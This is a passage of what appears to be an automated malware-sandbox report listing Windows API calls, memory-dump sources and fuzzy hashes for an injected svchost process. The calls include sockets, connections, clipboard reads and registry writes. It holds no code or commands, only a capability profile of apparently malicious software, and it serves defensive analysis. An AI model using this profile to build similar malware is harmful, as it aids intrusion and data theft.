• Instruction Fuzzy Hash: B43190714097846FD722CB619C84FABFFBCEF06210F0884DAE9848B663D224E809C771
Uniqueness
Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Figure omitted; basic blocks 65311fc-6531319, getaddrinfo called from block 65312bd-65312c5
                                                                        APIs
                                                                        • getaddrinfo.WS2_32(?,00000E24), ref: 065312C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: getaddrinfo
                                                                        • String ID:
                                                                        • API String ID: 300660673-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Figure omitted; basic blocks 33baa75-33bab7a, CreateFileW called from block 33bab1f-33bab43
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 033BAB25
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Figure omitted; basic blocks 33bb036-33bb132, CreateMutexW called from block 33bb0d7-33bb0fb
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 033BB0DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Figure omitted; basic blocks 33bb2d9-33bb3cf, RegQueryValueExW called from block 33bb38e-33bb3a1
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BB394
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Figure omitted; basic blocks 65309f0-6530ae3, ConvertStringSecurityDescriptorToSecurityDescriptorW called from block 6530a81-6530a89
                                                                        APIs
                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 06530A87
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: DescriptorSecurity$ConvertString
                                                                        • String ID:
                                                                        • API String ID: 3907675253-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Figure omitted; basic blocks 65310f4-65311e2, GetProcessTimes called from block 653118b-6531193
                                                                        APIs
                                                                        • GetProcessTimes.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06531191
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessTimes
                                                                        • String ID:
                                                                        • API String ID: 1995159646-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Figure omitted; basic blocks 6531fce-65320af, RegCreateKeyExW called from block 6532063-6532076
                                                                        APIs
                                                                        • RegCreateKeyExW.KERNELBASE(?,00000E24), ref: 06532069
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • OleGetClipboard.OLE32(?,00000E24,?,?), ref: 033BA77E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard
                                                                        • String ID:
                                                                        • API String ID: 220874293-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • getaddrinfo.WS2_32(?,00000E24), ref: 065312C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: getaddrinfo
                                                                        • String ID:
                                                                        • API String ID: 300660673-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(?,00000E24), ref: 033BB571
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendTimeout
                                                                        • String ID:
                                                                        • API String ID: 1599653421-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: select
                                                                        • String ID:
                                                                        • API String ID: 1274211008-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetExitCodeProcess.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 065326A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CodeExitProcess
                                                                        • String ID:
                                                                        • API String ID: 3861947596-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ReadFile.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BAF0D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BB480
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WSASocketW.WS2_32(?,?,?,?,?), ref: 065305DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Socket
                                                                        • String ID:
                                                                        • API String ID: 38366605-0
                                                                        • Opcode ID: f85ece6b29c060afc817affc8a4074e5dd17388415aa7c02567305e76b3b4f30
                                                                        • Instruction ID: d8626e641235dec2e45affb8a0c9cdedfc721b4a94cab4d580f73f7d3a88bf5a
                                                                        • Opcode Fuzzy Hash: f85ece6b29c060afc817affc8a4074e5dd17388415aa7c02567305e76b3b4f30
                                                                        • Instruction Fuzzy Hash: F0218071509380AFE721CF51DC45F96FFB8EF49224F08889EE9858B692D375A508CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileView
                                                                        • String ID:
                                                                        • API String ID: 3314676101-0
                                                                        • Opcode ID: 869c206f2714259cb9d24ca63f65cc39d98a6db5692c730b5d6ce1c5b544e50f
                                                                        • Instruction ID: f305b00142bc7f80a8387545eaf2c92e3a6ffacb3ac4beb0bc12373baa1998df
                                                                        • Opcode Fuzzy Hash: 869c206f2714259cb9d24ca63f65cc39d98a6db5692c730b5d6ce1c5b544e50f
                                                                        • Instruction Fuzzy Hash: A0218D71409384AFE722CB55DC44FA6FBF8EF09624F04849EE9858B692D375A908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 033BAB25
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 6041f3718270153a1234ac134a33900ad82f3fcf0731d17bf39a369336738ed0
                                                                        • Instruction ID: 41a97c9b50349c81260bba18a15689ebd344495e5b68013bfe11cc57df985b99
                                                                        • Opcode Fuzzy Hash: 6041f3718270153a1234ac134a33900ad82f3fcf0731d17bf39a369336738ed0
                                                                        • Instruction Fuzzy Hash: 0021B071604640AFEB20DF65DC84FA6FBE8EF08310F0884A9EA458BB51E775E408CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 06532396
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: d59532f859d11c2f27f931f15dacbcfe43654f323de844ceb16d5ffb927cf461
                                                                        • Instruction ID: dae0c7ac68c35ee575bd7fff89b07751e4c19542826826503a66fb428010a039
                                                                        • Opcode Fuzzy Hash: d59532f859d11c2f27f931f15dacbcfe43654f323de844ceb16d5ffb927cf461
                                                                        • Instruction Fuzzy Hash: C321A4B19097C05FD752CB25DC50B52BFA8AF46624F0984DAE888CF253D265E908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 06530A87
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: DescriptorSecurity$ConvertString
                                                                        • String ID:
                                                                        • API String ID: 3907675253-0
                                                                        • Opcode ID: 31cbe079cd1fcf24adabc57139acabbadb5e362a2ebafee7f81bc5bfa4163e4c
                                                                        • Instruction ID: cbe7ac84f7e0e5894c0e7e5db4a8f8ad99d897f1a81c6262e6daf9b14f1101f4
                                                                        • Opcode Fuzzy Hash: 31cbe079cd1fcf24adabc57139acabbadb5e362a2ebafee7f81bc5bfa4163e4c
                                                                        • Instruction Fuzzy Hash: 47219272500304AFE720DF65DC45FABBBACEF44614F08846AE945DB691E774E508CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 0653099C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 81a696751a0c1328893213b1f7592d4eb96419bd5e906c1aa4072781e1f04d00
                                                                        • Instruction ID: 9d12e8f6b70ef75885765a5dafa573d414f948c3de862b1077bb3b110c1de12b
                                                                        • Opcode Fuzzy Hash: 81a696751a0c1328893213b1f7592d4eb96419bd5e906c1aa4072781e1f04d00
                                                                        • Instruction Fuzzy Hash: 8D21A172909780AFE721CF11DC44F67BBF8AF45610F08849AE9459B692D324E908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 033BB291
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: 79166bbeb11c1b5a4c01540b362831ba1e942cf684b9acfec99a59f37612c0d3
                                                                        • Instruction ID: 0e434571b1154d4df97a133fc5986eb6639ea543f399a0c37a1c9b5a50f3aa37
                                                                        • Opcode Fuzzy Hash: 79166bbeb11c1b5a4c01540b362831ba1e942cf684b9acfec99a59f37612c0d3
                                                                        • Instruction Fuzzy Hash: 2721A172500604AEE720DF55DC84FABFBECEF04614F08845AEA459BB55E774E5088BB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(?), ref: 033BAA44
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 81113f27225f723c5bd4b683fe3424ac8b866bf578b86500147b85a0771139b1
                                                                        • Instruction ID: dec2196b9762e08268f2fa0e02f7ac8c2b918fdd2654dea3987f7f1c7b72b2b4
                                                                        • Opcode Fuzzy Hash: 81113f27225f723c5bd4b683fe3424ac8b866bf578b86500147b85a0771139b1
                                                                        • Instruction Fuzzy Hash: F6215C6540E7C09FD7138B259C64651BFB4EF57624F0E80DBD9848F6A3D268580CC772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileType.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BACBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileType
                                                                        • String ID:
                                                                        • API String ID: 3081899298-0
                                                                        • Opcode ID: 19339d5f663260973503b6ae55030dc76deedb9e23af7b3cccd237c0a1b176e2
                                                                        • Instruction ID: b5ab2cd50e4257f4168c57edcd204f523620a8be83e3997a10eaa66cc279bdb8
                                                                        • Opcode Fuzzy Hash: 19339d5f663260973503b6ae55030dc76deedb9e23af7b3cccd237c0a1b176e2
                                                                        • Instruction Fuzzy Hash: 9E21D5B54097806FE7128B15DC84BA3BFBCDF47324F0880DBE9848B693D268A909D771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetProcessWorkingSetSize.KERNEL32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 0653277F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSizeWorking
                                                                        • String ID:
                                                                        • API String ID: 3584180929-0
                                                                        • Opcode ID: fb3d0207b25202cfd4d4f4f26987934e96df97f5be81acade3985d801df4c057
                                                                        • Instruction ID: 0259c99152227d54f0252d37c1a5a77700cbefb982c0dc447f96e3607fa75f21
                                                                        • Opcode Fuzzy Hash: fb3d0207b25202cfd4d4f4f26987934e96df97f5be81acade3985d801df4c057
                                                                        • Instruction Fuzzy Hash: F821D4715093806FE721CF21DC48FA7BFA8EF45620F0884AAF944DB292D374A908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetProcessWorkingSetSize.KERNEL32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06532863
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSizeWorking
                                                                        • String ID:
                                                                        • API String ID: 3584180929-0
                                                                        • Opcode ID: fb3d0207b25202cfd4d4f4f26987934e96df97f5be81acade3985d801df4c057
                                                                        • Instruction ID: cc04b48367f94c360f91b42d0110d800f9ce770c85b1424763c611bc27866bd9
                                                                        • Opcode Fuzzy Hash: fb3d0207b25202cfd4d4f4f26987934e96df97f5be81acade3985d801df4c057
                                                                        • Instruction Fuzzy Hash: B021A4715097806FE721CF15DC44FA7FFA8EF46224F0884AAE944DB256D374A908CB75
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 033BB0DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 4c38ec0d872cc54d28a0bc913dcc41da0d17e90b10c28a1ae7284ecc8d831781
                                                                        • Instruction ID: 5b2be4af9181cb99b6a7e4dcb2ffbce9c899ac148d4174bf2527e0570ef51a5d
                                                                        • Opcode Fuzzy Hash: 4c38ec0d872cc54d28a0bc913dcc41da0d17e90b10c28a1ae7284ecc8d831781
                                                                        • Instruction Fuzzy Hash: 1321A4716042409FE720DF25DC85BA6FBE8EF04214F0884A9EE45CBB45EB79E508CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • shutdown.WS2_32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06530EC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: shutdown
                                                                        • String ID:
                                                                        • API String ID: 2510479042-0
                                                                        • Opcode ID: 6c19f1fad7a0658b40f8512cef57915846e1cff06c501f5879211155fd948d30
                                                                        • Instruction ID: a2662e960ecb579f1a14b6e298e47e1faf96fbebdefaa27966bfd224babee022
                                                                        • Opcode Fuzzy Hash: 6c19f1fad7a0658b40f8512cef57915846e1cff06c501f5879211155fd948d30
                                                                        • Instruction Fuzzy Hash: 9F2192B1509380AFD7128B14DC44B96BFB8EF46624F0884DAE9849F296D369A548CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: send
                                                                        • String ID:
                                                                        • API String ID: 2809346765-0
                                                                        • Opcode ID: 6252acae69f420ec534802938329a9ecf6a988b1d6bc71fed452b9b770cce8a9
                                                                        • Instruction ID: 684c28b01a0c311e7f3f6ec56fb9202c071b77679518440270097dc2065db817
                                                                        • Opcode Fuzzy Hash: 6252acae69f420ec534802938329a9ecf6a988b1d6bc71fed452b9b770cce8a9
                                                                        • Instruction Fuzzy Hash: A421AF7140D3C09FD7138B61DC54A52BFB4EF47220F0A84DBD9848F5A3D269A949CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BB394
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 266d918504ccfd2c2c286b20a0e97cd7d43fa06ef2c737b5334067a23c51c567
                                                                        • Instruction ID: d42452fbf14a9b94490814c7f44a86b1eb088dbde54ad6c6e07569e6045c7fdf
                                                                        • Opcode Fuzzy Hash: 266d918504ccfd2c2c286b20a0e97cd7d43fa06ef2c737b5334067a23c51c567
                                                                        • Instruction Fuzzy Hash: 6C218E75604200AFE720CE55DC84FA7F7ECEF04614F08845AEA49CBB51DBB4E908CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 033BABF0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 420772686556d35b9764ce6b2aef63bd948e4ccababcd92615c6d376ac79be8d
                                                                        • Instruction ID: 0b5d41cb92105ee5cbe5d2decedbdaeae352372ae7e54e0d299b3cc0eb29df2c
                                                                        • Opcode Fuzzy Hash: 420772686556d35b9764ce6b2aef63bd948e4ccababcd92615c6d376ac79be8d
                                                                        • Instruction Fuzzy Hash: EF21D1759097C09FDB128B25DC95792BFB8EF06220F0984DBED848B6A3D2649908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ioctlsocket.WS2_32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 065321F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ioctlsocket
                                                                        • String ID:
                                                                        • API String ID: 3577187118-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSASocketW.WS2_32(?,?,?,?,?), ref: 065305DE
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: Socket
• String ID:
• API String ID: 38366605-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0653144A
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: Connect
• String ID:
• API String ID: 3144859779-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageTimeoutA.USER32(?,00000E24), ref: 033BB571
Memory Dump Source
• Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
Similarity
• API ID: MessageSendTimeout
• String ID:
• API String ID: 1599653421-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNELBASE(?,00000E24), ref: 06531713
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegSetValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BB480
Memory Dump Source
• Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 0653099C
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessTimes.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06531191
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: ProcessTimes
• String ID:
• API String ID: 1995159646-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 033BA690
Memory Dump Source
